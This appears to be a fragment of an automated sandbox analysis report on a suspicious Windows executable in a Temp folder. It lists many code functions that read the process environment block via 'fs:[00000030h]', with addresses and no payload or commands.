          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]3_2_00ACB02A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]3_2_00B37016
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]3_2_00B37016
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]3_2_00B37016
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]3_2_00B84015
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]3_2_00B84015
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B72073 mov eax, dword ptr fs:[00000030h]3_2_00B72073
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B81074 mov eax, dword ptr fs:[00000030h]3_2_00B81074
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]3_2_00AD0050
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]3_2_00AD0050
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]3_2_00B351BE
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]3_2_00AE61A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]3_2_00AE61A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]3_2_00B749A4
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B369A6 mov eax, dword ptr fs:[00000030h]3_2_00B369A6
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA185 mov eax, dword ptr fs:[00000030h]3_2_00AEA185
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADC182 mov eax, dword ptr fs:[00000030h]3_2_00ADC182
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2990 mov eax, dword ptr fs:[00000030h]3_2_00AE2990
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]3_2_00ABB1E1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]3_2_00ABB1E1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]3_2_00ABB1E1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B441E8 mov eax, dword ptr fs:[00000030h]3_2_00B441E8
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD4120 mov ecx, dword ptr fs:[00000030h]3_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]3_2_00AE513A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]3_2_00AE513A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]3_2_00AB9100
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]3_2_00AB9100
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]3_2_00AB9100
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABC962 mov eax, dword ptr fs:[00000030h]3_2_00ABC962
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]3_2_00ABB171
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]3_2_00ABB171
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]3_2_00ADB944
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]3_2_00ADB944
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]3_2_00AB52A5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]3_2_00ACAAB0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]3_2_00ACAAB0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]3_2_00AEFAB0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]3_2_00AED294
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]3_2_00AED294
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]3_2_00AE2AE4
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2ACB mov eax, dword ptr fs:[00000030h]3_2_00AE2ACB
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]3_2_00AF4A2C
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]3_2_00AF4A2C
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]3_2_00B7AA16
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]3_2_00B7AA16
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC8A0A mov eax, dword ptr fs:[00000030h]3_2_00AC8A0A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD3A1C mov eax, dword ptr fs:[00000030h]3_2_00AD3A1C
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB5210 mov ecx, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h]3_2_00AB5210
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]3_2_00ABAA16
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h]3_2_00ABAA16
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF927A mov eax, dword ptr fs:[00000030h]3_2_00AF927A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]3_2_00B6B260
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h]3_2_00B6B260
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88A62 mov eax, dword ptr fs:[00000030h]3_2_00B88A62
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7EA55 mov eax, dword ptr fs:[00000030h]3_2_00B7EA55
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B44257 mov eax, dword ptr fs:[00000030h]3_2_00B44257
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h]3_2_00AB9240
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]3_2_00AE4BAD
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]3_2_00AE4BAD
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h]3_2_00AE4BAD
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B85BA5 mov eax, dword ptr fs:[00000030h]3_2_00B85BA5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]3_2_00AC1B8F
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h]3_2_00AC1B8F
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B6D380 mov ecx, dword ptr fs:[00000030h]3_2_00B6D380
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2397 mov eax, dword ptr fs:[00000030h]3_2_00AE2397
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7138A mov eax, dword ptr fs:[00000030h]3_2_00B7138A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEB390 mov eax, dword ptr fs:[00000030h]3_2_00AEB390
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]3_2_00ADDBE9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h]3_2_00AE03E2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]3_2_00B353CA
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h]3_2_00B353CA
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7131B mov eax, dword ptr fs:[00000030h]3_2_00B7131B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]3_2_00ABDB60
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]3_2_00AE3B7A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h]3_2_00AE3B7A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88B58 mov eax, dword ptr fs:[00000030h]3_2_00B88B58
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABDB40 mov eax, dword ptr fs:[00000030h]3_2_00ABDB40
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABF358 mov eax, dword ptr fs:[00000030h]3_2_00ABF358
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC849B mov eax, dword ptr fs:[00000030h]3_2_00AC849B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h]3_2_00B36CF0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B714FB mov eax, dword ptr fs:[00000030h]3_2_00B714FB
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88CD6 mov eax, dword ptr fs:[00000030h]3_2_00B88CD6
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEBC2C mov eax, dword ptr fs:[00000030h]3_2_00AEBC2C
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h]3_2_00B71C06
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h]3_2_00B8740D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h]3_2_00B36C0A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD746D mov eax, dword ptr fs:[00000030h]3_2_00AD746D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]3_2_00B4C450
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h]3_2_00B4C450
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEA44B mov eax, dword ptr fs:[00000030h]3_2_00AEA44B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE35A1 mov eax, dword ptr fs:[00000030h]3_2_00AE35A1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]3_2_00B805AC
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h]3_2_00B805AC
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AE1DB5
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h]3_2_00AB2D8A
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h]3_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]3_2_00AEFD9B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h]3_2_00AEFD9B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B68DF1 mov eax, dword ptr fs:[00000030h]3_2_00B68DF1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]3_2_00ACD5E0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]3_2_00ACD5E0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B7FDE2
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h]3_2_00B36DC9
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B3A537 mov eax, dword ptr fs:[00000030h]3_2_00B3A537
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B88D34 mov eax, dword ptr fs:[00000030h]3_2_00B88D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B7E539 mov eax, dword ptr fs:[00000030h]3_2_00B7E539
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ABAD30 mov eax, dword ptr fs:[00000030h]3_2_00ABAD30
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]3_2_00ADC577
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]3_2_00ADC577
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AF3D43 mov eax, dword ptr fs:[00000030h]3_2_00AF3D43
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B33540 mov eax, dword ptr fs:[00000030h]3_2_00B33540
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B63D40 mov eax, dword ptr fs:[00000030h]3_2_00B63D40
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AD7D50 mov eax, dword ptr fs:[00000030h]3_2_00AD7D50
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B346A7 mov eax, dword ptr fs:[00000030h]3_2_00B346A7
